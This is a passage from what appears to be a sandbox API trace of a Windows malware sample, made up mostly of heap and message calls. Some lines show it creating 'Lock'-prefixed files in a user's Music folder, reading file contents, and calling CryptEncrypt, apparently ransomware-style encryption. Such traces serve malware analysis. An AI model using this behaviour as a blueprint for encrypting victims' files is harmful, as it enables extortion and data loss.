lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0254.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0254.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.308] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0254.309] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.309] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0254.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0254.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0254.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0254.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0254.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0254.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0254.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x249c7b0 [0254.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.310] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0254.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0254.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0254.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0254.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/Lock.XeP-i8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lock.xep-i8.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0254.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0254.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0254.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0254.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0254.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0254.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.313] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0254.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0254.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0254.313] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0254.313] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0254.313] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0254.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0254.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0254.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0254.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0254.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0254.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0254.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0254.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0254.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0254.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0254.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0254.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0254.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0254.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0254.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0254.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0254.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0254.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0254.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0254.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0254.315] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0254.315] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x267b, lpOverlapped=0x0) returned 1 [0254.325] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0254.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0254.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x267b) returned 0x34a4048 [0254.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0254.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0254.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.327] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0254.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0254.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x267b) returned 0x34a4048 [0254.327] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0254.327] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0254.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0254.327] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0254.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0254.328] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0254.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.329] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0254.329] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0254.330] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0254.330] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0254.330] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.330] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.331] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.331] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0254.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0254.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.331] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.331] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.331] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.331] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.331] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.332] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.332] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.332] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.332] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x267b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x2680) returned 1 [0254.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.332] CharLowerBuffW (in: lpsz="byte[9856]", cchLength=0xa | out: lpsz="byte[9856]") returned 0xa [0254.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, 